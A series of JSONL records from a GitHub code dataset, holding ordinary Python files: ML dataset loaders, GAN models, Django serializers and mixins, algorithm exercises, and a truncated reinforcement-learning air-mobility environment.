answer\n\n","repo_name":"hayeonkimmie/Programmers","sub_path":"jieun/programmers/basic/230622.py","file_name":"230622.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"ko","doc_type":"code","dataset":"github-code","pt":"3"}
+{"seq_id":"4884954490","text":"import os\nimport numpy as np\nfrom PIL import Image\nimport scipy, scipy.io\nfrom easydict import EasyDict\nfrom collections import OrderedDict\nfrom torch.utils.data import Dataset\nfrom torchvision import datasets, transforms\nfrom celeba import CelebA\nimport torchvision.transforms.functional as F\n\nclass Crop(object):\n def __init__(self, x1, x2, y1, y2):\n self.x1 = x1\n self.x2 = x2\n self.y1 = y1\n self.y2 = y2\n\n def __call__(self, img):\n return F.crop(img, self.x1, self.y1, self.x2 - self.x1, self.y2 - self.y1)\n\n def __repr__(self):\n return self.__class__.__name__ + \"(x1={}, x2={}, y1={}, y2={})\".format(\n self.x1, self.x2, self.y1, self.y2\n )\n\ndef fix_legacy_dict(d):\n keys = list(d.keys())\n if \"model\" in keys:\n d = d[\"model\"]\n if \"state_dict\" in keys:\n d = d[\"state_dict\"]\n keys = list(d.keys())\n # remove multi-gpu module.\n if \"module.\" in keys[1]:\n d = remove_module(d)\n return d\n \n\ndef get_dataset(name, data_dir):\n \"\"\"\n Return a dataset with the current name. We only support two datasets with\n their fixed image resolutions. One can easily add additional datasets here.\n\n Note: To avoid learning the distribution of transformed data, don't use heavy\n data augmentation with diffusion models.\n \"\"\"\n if name == \"mnist\":\n transform_train = transforms.Compose(\n [\n transforms.ToTensor(),\n ]\n )\n train_set = datasets.MNIST(\n root=data_dir,\n train=True,\n download=True,\n transform=transform_train,\n )\n elif name == \"mnist_m\":\n transform_train = transforms.Compose(\n [\n transforms.ToTensor(),\n ]\n )\n train_set = datasets.ImageFolder(\n data_dir,\n transform=transform_train,\n )\n elif name == \"cifar10\":\n transform_train = transforms.Compose(\n [\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n ]\n )\n train_set = datasets.CIFAR10(\n root=data_dir,\n train=True,\n download=True,\n transform=transform_train,\n )\n elif name == \"celeba64\":\n # celebA has a large number of images, avoiding randomcropping.\n\n cx = 89\n cy = 121\n x1 = cy - 64\n x2 = cy + 64\n y1 = cx - 64\n y2 = cx + 64\n train_set = CelebA(\n root=os.path.join(data_dir),\n split=\"train\",\n transform=transforms.Compose(\n [\n Crop(x1, x2, y1, y2),\n transforms.Resize(64),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n ]\n ),\n download = True\n )\n # transform_train = transforms.Compose(\n # [\n # transforms.Resize(64),\n # transforms.CenterCrop(64),\n # transforms.RandomHorizontalFlip(),\n # transforms.ToTensor(),\n # ]\n # )\n # train_set = datasets.ImageFolder(\n # data_dir,\n # transform=transform_train,\n # )\n elif name == \"cars\":\n transform_train = transforms.Compose(\n [\n transforms.Resize(64),\n transforms.RandomCrop(64),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n ]\n )\n train_set = datasets.ImageFolder(\n data_dir,\n transform=transform_train,\n )\n elif name == \"flowers\":\n transform_train = transforms.Compose(\n [\n transforms.Resize(64),\n transforms.RandomCrop(64),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n ]\n )\n splits = scipy.io.loadmat(os.path.join(data_dir, \"setid.mat\"))\n labels = scipy.io.loadmat(os.path.join(data_dir, \"imagelabels.mat\"))\n labels = labels[\"labels\"][0]\n train_set = oxford_flowers_dataset(\n np.concatenate((splits[\"trnid\"][0], splits[\"valid\"][0]), axis=0),\n labels,\n data_dir,\n transform_train,\n )\n elif name == \"gtsrb\":\n # celebA has a large number of images, avoiding randomcropping.\n transform_train = transforms.Compose(\n [\n transforms.Resize((32, 32)),\n transforms.ToTensor(),\n ]\n )\n train_set = datasets.ImageFolder(\n data_dir,\n transform=transform_train,\n )\n else:\n raise ValueError(f\"{name} dataset nor supported!\")\n return train_set\n\n\ndef remove_module(d):\n return OrderedDict({(k[len(\"module.\") :], v) for (k, v) in d.items()})\n\n\ndef fix_legacy_dict(d):\n keys = list(d.keys())\n if \"model\" in keys:\n d = d[\"model\"]\n if \"state_dict\" in keys:\n d = d[\"state_dict\"]\n keys = list(d.keys())\n # remove multi-gpu module.\n if \"module.\" in keys[1]:\n d = remove_module(d)\n return d\n","repo_name":"UW-Madison-Lee-Lab/SFT-PG","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":5271,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"3"}
+{"seq_id":"12330492589","text":"from rest_framework import serializers\n\nfrom talent.models import ClassImage, Talent\n\n__all__ = (\n 'ClassImageSerializer',\n 'ClassImageCreateSerializer',\n 'ClassImageUpdateSerializer'\n)\n\n\nclass ClassImageSerializer(serializers.ModelSerializer):\n talent_pk = serializers.PrimaryKeyRelatedField(read_only=True, source='talent.id')\n\n class Meta:\n model = ClassImage\n fields = (\n 'pk',\n 'talent_pk',\n 'image',\n )\n\n\nclass ClassImageCreateSerializer(serializers.ModelSerializer):\n talent_pk = serializers.PrimaryKeyRelatedField(queryset=Talent.objects.all(), source='talent')\n\n class Meta:\n model = ClassImage\n fields = (\n 'talent_pk',\n 'image',\n )\n\n\nclass ClassImageUpdateSerializer(serializers.ModelSerializer):\n class Meta:\n model = ClassImage\n fields = (\n 'image',\n )\n","repo_name":"lewis810k/gori","sub_path":"django_app/talent/serializers/class_image.py","file_name":"class_image.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"287410928","text":"from collections import defaultdict\n\n\nclass FrequencyStack:\n def __init__(self):\n # maintain stacks for different frequencies\n self.counts = defaultdict(int)\n self.stacks = defaultdict(list)\n\n def append(self, val):\n self.counts[val] += 1\n self.stacks[self.counts[val]].append(val)\n\n def pop(self):\n popKey = len(self.stacks)\n popped = self.stacks[popKey].pop()\n if not self.stacks[popKey]:\n self.stacks.pop(popKey)\n self.counts[popped] -= 1\n return popped\n","repo_name":"yaeba/binary-search-solutions","sub_path":"solutions/Frequency-Stack.py","file_name":"Frequency-Stack.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"1340153187","text":"import torchvision\n\nfrom models.network_v1 import NetworkV1\nfrom models.network_v2 import NetworkV2\nfrom models.network_v3 import NetworkV3\n\n\ndef construct_model(config, num_classes, num_makes, num_types):\n if config['arch'] == 'resnext50':\n base = torchvision.models.resnext50_32x4d(pretrained=True)\n elif config['arch'] == 'resnet34':\n base = torchvision.models.resnet34(pretrained=True)\n else: # mobilenetv2\n base = torchvision.models.mobilenet_v2(pretrained=True)\n\n if config['version'] == 1:\n model = NetworkV1(base, num_classes)\n elif config['version'] == 2:\n model = NetworkV2(base, num_classes, num_makes, num_types)\n else:\n model = NetworkV3(base, num_classes, num_makes, num_types)\n\n return model\n","repo_name":"kamwoh/Car-Model-Classification","sub_path":"models/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"3"}
+{"seq_id":"7261550661","text":"import torch\nfrom torch import nn\n\n\n\nclass ResidualBlock(nn.Module):\n \"\"\"\n ResidualBlock Class\n Performs two convolutions and an instance normnlization, the input is added\n to this output to form the residual block output.\n\n Args:\n input_channels (int): the number of channels to expect from a given input\n \"\"\"\n def __init__(self, input_channels):\n super().__init__()\n self.conv1 = nn.Conv2d(input_channels, input_channels, kernel_size=3, padding=1, padding_mode=\"reflect\")\n self.conv2 = nn.Conv2d(input_channels, input_channels, kernel_size=3, padding=1, padding_mode=\"reflect\")\n self.instancenorm = nn.InstanceNorm2d(input_channels)\n self.activation = nn.ReLU()\n\n def forward(self, x):\n \"\"\"Method for completing a forward pass of ResidualBlock\n\n Args:\n x (tensor): Image tensor of shape (batch_size, num_channels, heioght, width)\n \"\"\"\n original_x = x.clone()\n x = self.conv1(x)\n x = self.instancenorm(x)\n x = self.activation(x)\n x = self.conv2(x)\n x = self.instancenorm(x)\n return original_x + x\n\n\nclass ContractingBlock(nn.Module):\n \"\"\"\n Contracting Block Class\n Performs a convolution followed by a max pool operation and an optional instance norm.\n\n Args:\n input_channels (int): The number of channels to expect from a given input\n \"\"\"\n def __init__(self, input_channels, use_bn=True, kernel_size=3, activation=\"relu\"):\n super().__init__()\n self.conv1 = nn.Conv2d(input_channels, input_channels * 2, kernel_size=kernel_size, padding=1, stride=2, padding_mode=\"reflect\")\n self.activation = nn.ReLU() if activation == \"relu\" else nn.LeakyReLU(0.2)\n if use_bn:\n self.instancenorm = nn.InstanceNorm2d(input_channels * 2)\n self.use_bn = use_bn\n\n def forward(self, x):\n \"\"\"Method for completing a forward pass of COntactingBlock\n\n Args:\n x (tensor): Image tensor of shape (batch_size, n_channels, height, width)\n \"\"\"\n x = self.conv1(x)\n if self.use_bn:\n x = self.instancenorm(x)\n x = self.activation(x)\n return x\n\n\nclass ExpandingBlock(nn.Module):\n \"\"\"ExpandingBlock Class\n Performs a convolutional transpose operation ir order to upsample with optional instance norm\n\n Args:\n input_channels (int): The number of channels to expect from a gicen input\n \"\"\"\n def __init__(self, input_channels, use_bn=True):\n super().__init__()\n self.conv1 = nn.ConvTranspose2d(input_channels, input_channels //2, kernel_size=3, stride=2, padding=1, output_padding=1)\n if use_bn: \n self.instancenorm = nn.InstanceNorm2d(input_channels // 2)\n self.use_bn = use_bn\n self.activation = nn.ReLU()\n\n def forward(self, x):\n \"\"\"Method for completing a forward pass of ExpandingBlock\n\n Args:\n x (tensor): Image tensor of shape (batch_size, n_channels, height, width)\n \"\"\"\n x = self.conv1(x)\n if self.use_bn:\n x = self.instancenorm(x)\n x = self.activation(x)\n return x\n\n\nclass FeatureMapBlock(nn.Module):\n \"\"\"FeatureMapBlock Class\n The final layer of the generator\n Args:\n input_channels (int): the number of channels to expect from a given input\n output_channels (int): the number of channels to expect for a given output\n \"\"\"\n def __init__(self, input_channels, output_channels):\n super().__init__()\n self.conv = nn.Conv2d(input_channels, output_channels, kernel_size=7, padding=3, padding_mode=\"reflect\")\n \n def forward(self, x):\n \"\"\"Method for completing a forward pass of FeatureMap Block\n\n Args:\n x (tensor): Image tensor of shape (batch_size, n_channels, height, width)\n \"\"\"\n x = self.conv(x)\n return x\n\n\nclass Generator(nn.Module):\n \"\"\"Generator Class\n 2 Conctracting Blocks, 9 Residual Blocks, 2 Expanding Blocks\n Args:\n input_channels (int): number of channels to expect from a given input\n output_channels (int): number of channels to expect from a given output\n \"\"\"\n def __init__(self, input_channels, output_channels, hidden_channels=64):\n super().__init__()\n self.upfeature = FeatureMapBlock(input_channels, hidden_channels)\n self.contract1 = ContractingBlock(hidden_channels)\n self.contract2 = ContractingBlock(hidden_channels * 2 )\n res_mult = 4 \n self.res0 = ResidualBlock(hidden_channels * res_mult)\n self.res1 = ResidualBlock(hidden_channels * res_mult)\n self.res2 = ResidualBlock(hidden_channels * res_mult)\n self.res3 = ResidualBlock(hidden_channels * res_mult)\n self.res4 = ResidualBlock(hidden_channels * res_mult)\n self.res5 = ResidualBlock(hidden_channels * res_mult)\n self.res6 = ResidualBlock(hidden_channels * res_mult)\n self.res7 = ResidualBlock(hidden_channels * res_mult)\n self.res8 = ResidualBlock(hidden_channels * res_mult)\n self.expand1 = ExpandingBlock(hidden_channels * 4)\n self.expand2 = ExpandingBlock(hidden_channels * 2)\n self.downfeature = FeatureMapBlock(hidden_channels, output_channels)\n self.tanh = nn.Tanh()\n\n def forward(self, x):\n \"\"\"Method for completing a forward pass of the Generator\n\n Args:\n x (tensor): Image tensor of shape (batch_size, n_channels, height, width)\n \"\"\"\n x0 = self.upfeature(x)\n x1 = self.contract1(x0)\n x2 = self.contract2(x1)\n x3 = self.res0(x2)\n x4 = self.res1(x3)\n x5 = self.res2(x4)\n x6 = self.res3(x5)\n x7 = self.res4(x6)\n x8 = self.res5(x7)\n x9 = self.res6(x8)\n x10 = self.res7(x9)\n x11 = self.res8(x10)\n x12 = self.expand1(x11)\n x13 = self.expand2(x12)\n xn = self.downfeature(x13)\n return self.tanh(xn)\n\n\nclass Dicriminator(nn.Module):\n \"\"\"Discriminator Class\n\n Args:\n input_channels (int): the number of image input channels\n hidden_channels (int): the initial number of discriminator convolutional filters\n \"\"\"\n def __init__(self, input_channels, hidden_channels=64):\n super().__init__()\n self.upfeature = FeatureMapBlock(input_channels, hidden_channels)\n self.contract1 = ContractingBlock(hidden_channels, use_bn=False, kernel_size=4, activation=\"lrelu\")\n self.contract2 = ContractingBlock(hidden_channels * 2, kernel_size=4, activation=\"lrelu\")\n self.contract3 = ContractingBlock(hidden_channels * 4, kernel_size=4, activation=\"lrelu\")\n self.final = nn.Conv2d(hidden_channels * 8, 1, kernel_size= 1)\n\n def forward(self, x):\n x0 = self.upfeature(x)\n x1 = self.contract1(x0)\n x2 = self.contract2(x1)\n x3 = self.contract3(x2)\n xn = self.final(x3)\n return xn\n \n","repo_name":"JuanPabloArbelaez/CycleGAN","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"2731789799","text":"import unittest\nfrom typing import Optional\n\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\n# O()\nclass Solution:\n def invertTree(self, root: Optional[TreeNode]) -> Optional[TreeNode]:\n if root:\n s_left = s_right = None\n if root.left:\n s_right = self.invertTree(root.left)\n if root.right:\n s_left = self.invertTree(root.right)\n root.left, root.right = s_left, s_right\n return root\n\n\nclass TestSolution(unittest.TestCase):\n def setUp(self):\n self.sol = Solution()\n\n def test_solution(self):\n self.assertEqual(1, 1)\n\n\ndef main():\n unittest.main()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"matthewcordaro/leet-code-python","sub_path":"finished/201-500/226. Invert Binary Tree/invert-binary-tree.py","file_name":"invert-binary-tree.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"73277690000","text":"from django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.core.serializers import serialize\nfrom django.db.models import Case, Q, When\nfrom django.http import Http404, HttpResponseForbidden, JsonResponse\n\nfrom rest_framework.response import Response\n\nfrom hikster.hike.models import Activity, Trail\nfrom hikster.hike.utils import graph_edges_nodes\nfrom hikster.organizations.models import Organization\nfrom hikster.utils.models import Contact\n\n\nclass OrganizationMixin:\n section = None\n\n def __init__(self, *args, **kwargs):\n self.organization = None\n\n super().__init__(*args, **kwargs)\n\n def dispatch(self, request, *args, **kwargs):\n try:\n organization = Organization.objects.get(id=kwargs[\"organization_id\"])\n\n except Organization.DoesNotExist:\n raise Http404()\n\n try:\n organization.members.get(user=request.user)\n except ObjectDoesNotExist:\n return HttpResponseForbidden()\n\n self.organization = organization\n\n return super().dispatch(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n context[\"section\"] = self.section\n context[\"organization\"] = self.organization\n\n return context\n\n\nclass TrailDetailMixin(LoginRequiredMixin, OrganizationMixin):\n def get_common_context(self):\n context = {}\n activities = Activity.objects.values(\"id\", \"name\").order_by(\"id\")\n context[\"activities\"] = list(activities)\n context[\"map_style\"] = \"admin-trail-detail\"\n context[\"path_types\"] = Trail.PATH_TYPES\n context[\"locations\"] = list(\n self.organization.locations.values(\"location_id\", \"name\").order_by(\"name\")\n )\n trail_sections = self.organization.trail_sections.prefetch_related(\"activities\")\n context[\"trail_sections_geojson\"] = serialize(\n \"geojson\",\n trail_sections,\n geometry_field=\"shape\",\n fields=(\"pk\", \"trailsection_id\", \"name\"),\n )\n context[\"graph\"] = graph_edges_nodes(trail_sections)\n return context\n\n\nclass JsonResponseMixin(object):\n def get(self, request, *args, **kwargs):\n context = self.get_context_data(**kwargs)\n if request.is_ajax():\n return JsonResponse(context)\n return self.render_to_response(context)\n\n def get_query(self, key):\n return self.request.GET.get(key, None)\n\n\nclass FileUploadViewMixin(object):\n def _file_upload(self, request, **kwargs):\n serializer = self.get_serializer(\n data=request.data, partial=True, context={\"request\": request}\n )\n\n serializer.is_valid(raise_exception=True)\n instance = serializer.save(\n credit=request.data.get(\"credit\"),\n image_type=request.data.get(\"image_type\"),\n **kwargs\n )\n\n serializer = self.get_serializer(instance)\n return Response(serializer.data)\n\n\nclass POIViewMixin(LoginRequiredMixin, OrganizationMixin):\n poi_categories = []\n\n def get_query(self, key):\n return self.request.GET.get(key, None)\n\n def get_pois(self):\n pois = self.organization.point_of_interests.filter(\n visible_in_map=1, category__in=[1, 3, 4, 5, 6]\n )\n if self.get_query(\"category\") is not None:\n pois = pois.filter(category=self.get_query(\"category\"))\n\n if self.get_query(\"type\") is not None:\n pois = pois.filter(type=self.get_query(\"type\"))\n\n return pois.annotate(\n display_name=Case(\n When(Q(name__isnull=True) | Q(name=\"\"), then=\"type__name\"),\n default=\"name\",\n )\n )\n\n def get_common_context(self):\n context = {}\n context[\"contact_types_data\"] = [\n type_\n for type_ in Contact.TYPE_CHOICES\n if type_[0] in Contact.FRONTEND_TYPES\n ]\n context[\"trail_sections_geojson\"] = serialize(\n \"geojson\",\n self.organization.trail_sections,\n geometry_field=\"shape\",\n fields=(\"pk\", \"trailsection_id\", \"name\"),\n )\n other_pois = self.get_pois()\n if hasattr(self, \"object\"):\n other_pois = other_pois.exclude(pk=self.object.pk)\n\n context[\"other_pois_geojson\"] = serialize(\n \"geojson\",\n other_pois,\n geometry_field=\"shape\",\n fields=(\"pk\", \"poi_id\", \"name\"),\n )\n context[\"poi_categories\"] = self.poi_categories\n context[\"location_geojson\"] = serialize(\n \"geojson\",\n self.organization.locations.all(),\n geometry_field=\"shape\",\n fields=(\"pk\",),\n )\n return context\n","repo_name":"genie4viz/django-vue","sub_path":"hikster/admin/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":4843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"22615374111","text":"# 合并排序\n\n\ndef merge(a, p, q, r):\n L = a[p:q+1] # 这里直接利用列表切片赋值,比c中的循环复制方便\n R = a[q+1:r+1]\n L.append(4399)\n R.append(4399)\n i = 0\n j = 0\n for k in range(p, r+1):\n if L[i] <= R[j]:\n a[k] = L[i]\n i = i+1\n else:\n a[k] = R[j]\n j = j+1\n return 0 # return 是函数结束的标志,因此def函数要记得有返回类型,如果进行处理,就返回0之类的\n\n\ndef merge_sort(a, p, r):\n if p < r:\n q = int((p+r)/2)\n merge_sort(a, p, q) # 注意一点,形参在遇到return后就释放了\n merge_sort(a, q+1, r)\n merge(a, p, q, r)\n return 0\n\n\nA = eval(input('Please input a list:')) # eval去掉输入的字符串的引号,数字就是数字,变量就是变量,列表就是列表\nprint('Before sort:', A)\nmerge_sort(A, 0, len(A)-1)\nprint('After sort:', A)\n","repo_name":"shajunguang/Introduction-to-Algotithms","sub_path":"Chapter_02/Merge_Sort.py","file_name":"Merge_Sort.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"23102223671","text":"import random\nfrom copy import copy\nfrom string import ascii_letters\nfrom typing import List\n\nimport gym\nfrom bluesky.tools.geo import latlondist, qdrdist, qdrpos\nfrom gym import spaces\nfrom matplotlib import pyplot as plt\nfrom mycolorpy import colorlist as mcp\n\nfrom tud_rl.agents.base import _Agent\nfrom tud_rl.envs._envs.HHOS_Fnc import to_utm\nfrom tud_rl.envs._envs.Plane import *\nfrom tud_rl.envs._envs.VesselFnc import (NM_to_meter, angle_to_2pi,\n angle_to_pi, dtr, meter_to_NM)\n\nCOLORS = [plt.rcParams[\"axes.prop_cycle\"].by_key()[\"color\"][i] for i in range(8)] + 5 * mcp.gen_color(cmap=\"tab20b\", n=20) \n\n\nclass Destination:\n def __init__(self, dt) -> None:\n # size\n self.radius = 100 # [m]\n self.spawn_radius = 1100 # [m]\n self.respawn_radius = 1300 # [m]\n \n # position\n self.lat = 10 # [deg]\n self.lon = 10 # [deg]\n self.N, self.E, _ = to_utm(self.lat, self.lon) # [m], [m]\n\n # timing\n self.dt = dt # [s], simulation time step\n self._t_close = 60 # [s], time the destination is closed after an aircraft has entered \n self._t_nxt_open = 0 # [s], current time until the destination opens again\n self._t_open_since = 0 # [s], current time since the vertiport is open\n self._was_open = True\n self.open()\n\n def reset(self):\n self.open()\n\n def step(self, planes: List[Plane]):\n \"\"\"Updates status of the destination.\n Returns:\n np.ndarray([number_of_planes,]): who entered a closed destination\n np.ndarray([number_of_planes,]): who entered an open destination\"\"\"\n # count time until next opening\n if self._is_open is False:\n self._t_nxt_open -= self.dt\n if self._t_nxt_open <= 0:\n self.open()\n else:\n self._t_open_since += self.dt\n\n # store opening status\n self._was_open = copy(self._is_open)\n\n # check who entered a closed or open destination\n entered_close = np.zeros(len(planes), dtype=bool)\n entered_open = np.zeros(len(planes), dtype=bool)\n\n for i, p in enumerate(planes):\n if p.D_dest <= self.radius: \n if self._is_open:\n entered_open[i] = True\n else:\n entered_close[i] = True\n\n # close if someone entered\n if any(entered_open):\n self.close()\n\n return entered_close, entered_open\n\n def open(self):\n self._t_open_since = 0\n self._t_nxt_open = 0\n self._is_open = True\n self.color = \"green\"\n \n def close(self):\n self._t_open_since = 0\n self._is_open = False\n self._t_nxt_open = copy(self._t_close)\n self.color = \"red\"\n\n @property\n def t_nxt_open(self):\n return self._t_nxt_open\n\n @property\n def t_close(self):\n return self._t_close\n\n @property\n def t_open_since(self):\n return self._t_open_since\n\n @property\n def is_open(self):\n return self._is_open\n\n @property\n def was_open(self):\n return self._was_open\n\n\nclass UAM(gym.Env):\n \"\"\"Urban air mobility simulation env based on the BlueSky simulator of Ellerbroek and Hoekstra.\n Note: If multi_policy is True, each plane is considered an agent. Otherwise, the first plane operates as a single agent.\"\"\"\n def __init__(self, \n N_agents_max :int, \n multi_policy :bool, \n prio:bool,\n full_RL:bool, \n w_coll:float, \n w_goal:float):\n super(UAM, self).__init__()\n\n # setup\n self.N_agents_max = N_agents_max\n assert N_agents_max > 1, \"Need at least two aircrafts.\"\n\n self.multi_policy = multi_policy\n self.prio = prio\n\n self.acalt = 300 # [m]\n self.actas = 15 # [m/s]\n self.actype = \"MAVIC\"\n\n if not multi_policy:\n self.history_length = 2\n\n self.full_RL = full_RL\n self.w_coll = w_coll\n self.w_goal = w_goal\n self.w = self.w_coll + self.w_goal\n\n # domain params\n self.incident_dist = 100 # [m]\n self.accident_dist = 10 # [m]\n self.clock_degs = np.linspace(0.0, 360.0, num=100, endpoint=True)\n\n # destination\n self.dt = 1.0\n self.dest = Destination(self.dt)\n\n # performance model\n self.perf = OpenAP(self.actype, self.actas, self.acalt)\n\n # config\n self.OS_obs = 5 if prio else 4\n self.obs_per_TS = 5 if prio else 4\n self.obs_size = self.OS_obs + self.obs_per_TS*(self.N_agents_max-1)\n\n self.observation_space = spaces.Box(low = np.full(self.obs_size, -np.inf, dtype=np.float32), \n high = np.full(self.obs_size, np.inf, dtype=np.float32))\n self.act_size = 1\n self.action_space = spaces.Box(low = np.full(self.act_size, -1.0, dtype=np.float32), \n high = np.full(self.act_size, +1.0, dtype=np.float32))\n self._max_episode_steps = 500\n\n # viz\n self.plot_reward = True\n self.plot_state = True\n\n atts = [\"D_TS\", \"bng_TS\", \"V_R\", \"C_T\", \"next\"]\n\n other_names = []\n for i in range(self.N_agents_max-1):\n others = [ele + ascii_letters[i] for ele in atts]\n other_names += others\n\n self.obs_names = [\"bng_goal\", \"D_goal\", \"next\", \"t_close\", \"t_open\"] + other_names\n\n def reset(self):\n \"\"\"Resets environment to initial state.\"\"\"\n self.step_cnt = 0 # simulation step counter\n self.sim_t = 0 # overall passed simulation time (in s)\n\n self.N_accs = 0 # number of accidents during episode\n self.N_incs = 0 # number of incidents during episode\n self.N_enterances_closed_d = 0 # number of enterances to the vertiport although it was closed\n\n # create some aircrafts\n self.planes:List[Plane] = []\n\n if self.multi_policy:\n self.N_planes = self.N_agents_max\n else:\n self.N_planes = np.random.choice([2, 4, 6, 8, 10])\n\n for n in range(self.N_planes):\n self.planes.append(self._spawn_plane(n, random=bool(random.getrandbits(1))))\n\n # init live times\n if self.prio:\n self.ts_alive = np.array(random.sample(population=list(range(0, 61)), k=self.N_planes))\n self.ts_alive[0] = 100\n\n # reset dest\n self.dest.reset()\n\n # init state\n self._set_state()\n self.state_init = self.state\n return self.state\n\n def _spawn_plane(self, n:int=None, random:bool=False):\n \"\"\"Spawns the n-th plane. Currently, the argument is not in use but might be relevant for some validation scenarios.\"\"\"\n # sample heading and speed\n hdg = float(np.random.uniform(0.0, 360.0, size=1))\n tas = float(np.random.uniform(self.actas-3.0, self.actas+3.0, size=1))\n\n if random:\n qdr = float(np.random.uniform(0.0, 360.0, size=1))\n dist = float(np.random.uniform(low=self.dest.radius, high=self.dest.spawn_radius, size=1))\n else:\n qdr = hdg\n dist = self.dest.spawn_radius\n\n # determine origin\n lat, lon = qdrpos(latd1=self.dest.lat, lond1=self.dest.lon, qdr=qdr, dist=meter_to_NM(dist))\n\n # consider behavior type\n p = Plane(role=\"RL\", dt=self.dt, actype=self.actype, lat=lat, lon=lon, alt=self.acalt, hdg=(hdg+180)%360, tas=tas) \n\n # compute initial distance to destination\n p.D_dest = latlondist(latd1=self.dest.lat, lond1=self.dest.lon, latd2=lat, lond2=lon)\n p.D_dest_old = copy(p.D_dest)\n return p\n\n def _set_state(self):\n # usual state of shape [N_planes, obs_size]\n if self.multi_policy:\n self.state = self._get_state_multi()\n\n # since we use a spatial-temporal recursive approach, we need multi-agent history as well\n else:\n self.state = self._get_state(0)\n\n if self.step_cnt == 0:\n self.s_multi_hist = np.zeros((self.history_length, self.N_planes, self.obs_size)) \n self.hist_len = 0\n self.s_multi_old = np.zeros((self.N_planes, self.obs_size))\n else:\n # update history, where most recent state component is the old state from last step\n if self.hist_len == self.history_length:\n self.s_multi_hist = np.roll(self.s_multi_hist, shift=-1, axis=0)\n self.s_multi_hist[self.history_length - 1] = self.s_multi_old\n else:\n self.s_multi_hist[self.hist_len] = self.s_multi_old\n self.hist_len += 1\n\n # overwrite old state\n self.s_multi_old = self._get_state_multi()\n\n def _get_state_multi(self) -> None:\n \"\"\"Computes the state in the multi-agent scenario.\"\"\"\n s = np.zeros((self.N_planes, self.obs_size), dtype=np.float32)\n for i, _ in enumerate(self.planes):\n s[i] = self._get_state(i)\n return s\n\n def _get_state(self, i:int) -> np.ndarray:\n \"\"\"Computes the state from the perspective of the i-th agent of the internal plane array.\n \n This is a np.array of size [3 + 4*(N_planes-1),] containing own relative bearing of goal, distance to goal, \n common four information about target ships (relative speed, relative bearing, distance, heading intersection angle),\n and time until destination opens again.\"\"\"\n\n # select plane of interest\n p = self.planes[i]\n\n # distance, bearing to goal, time alive, time to opening, time since open\n abs_bng_goal, d_goal = qdrdist(latd1=p.lat, lond1=p.lon, latd2=self.dest.lat, lond2=self.dest.lon) # outputs ABSOLUTE bearing\n bng_goal = angle_to_pi(angle_to_2pi(dtr(abs_bng_goal)) - dtr(p.hdg))\n s_i = np.array([bng_goal/np.pi,\n NM_to_meter(d_goal)/self.dest.spawn_radius,\n 1.0-self.dest.t_nxt_open/self.dest.t_close,\n 1.0-self.dest.t_open_since/self.dest.t_close])\n if self.prio:\n s_i = np.append(s_i, [1.0 if self.ts_alive[i] == np.max(self.ts_alive) else -1.0])\n\n # information about other planes\n if self.N_planes > 1:\n TS_info = []\n for j, other in enumerate(self.planes):\n if i != j:\n # relative speed\n v_r = other.tas - p.tas\n\n # bearing and distance\n abs_bng, d = qdrdist(latd1=p.lat, lond1=p.lon, latd2=other.lat, lond2=other.lon)\n bng = angle_to_pi(angle_to_2pi(dtr(abs_bng)) - dtr(p.hdg))/np.pi\n d = NM_to_meter(d)/self.dest.spawn_radius\n\n # heading intersection\n C_T = angle_to_pi(np.radians(other.hdg - p.hdg))/np.pi\n\n # aggregate\n j_info = [d, bng, v_r, C_T]\n\n # time alive\n if self.prio:\n j_info += [1.0 if self.ts_alive[j] == np.max(self.ts_alive) else -1.0]\n\n TS_info.append(j_info)\n\n # sort array according to distance\n TS_info = np.hstack(sorted(TS_info, key=lambda x: x[0], reverse=True)).astype(np.float32)\n\n # ghost ship padding not needed since we always demand at least two planes\n # however, we need to pad NA's as usual in single-agent LSTMRecTD3\n if (not self.multi_policy):\n desired_length = self.obs_per_TS * (self.N_agents_max-1)\n TS_info = np.pad(TS_info, (0, desired_length - len(TS_info)), 'constant', constant_values=np.nan).astype(np.float32)\n\n s_i = np.concatenate((s_i, TS_info))\n return s_i\n\n def step(self, a):\n \"\"\"Arg a:\n In multi-policy scenarios with continuous actions and no communication:\n np.array([N_planes, action_dim])\n\n In single-policy:\n _agent\"\"\"\n # increase step cnt and overall simulation time\n self.step_cnt += 1\n self.sim_t += self.dt\n \n # fly all planes in multi-policy situation\n if self.multi_policy:\n [p.upd_dynamics(a=a[i], discrete_acts=False, perf=self.perf, dest=None) for i, p in enumerate(self.planes)]\n\n # in single-policy situation, action corresponds to first plane, while the others are either RL or VFG\n else:\n cnt_agent:_Agent = a\n\n # collect states from planes\n states_multi = self._get_state_multi()\n\n for i, p in enumerate(self.planes):\n\n # fly planes depending on whether they are RL-, VFG-, or RND-controlled\n if p.role == \"RL\":\n\n # spatial-temporal recurrent\n act = cnt_agent.select_action(s = states_multi[i], \n 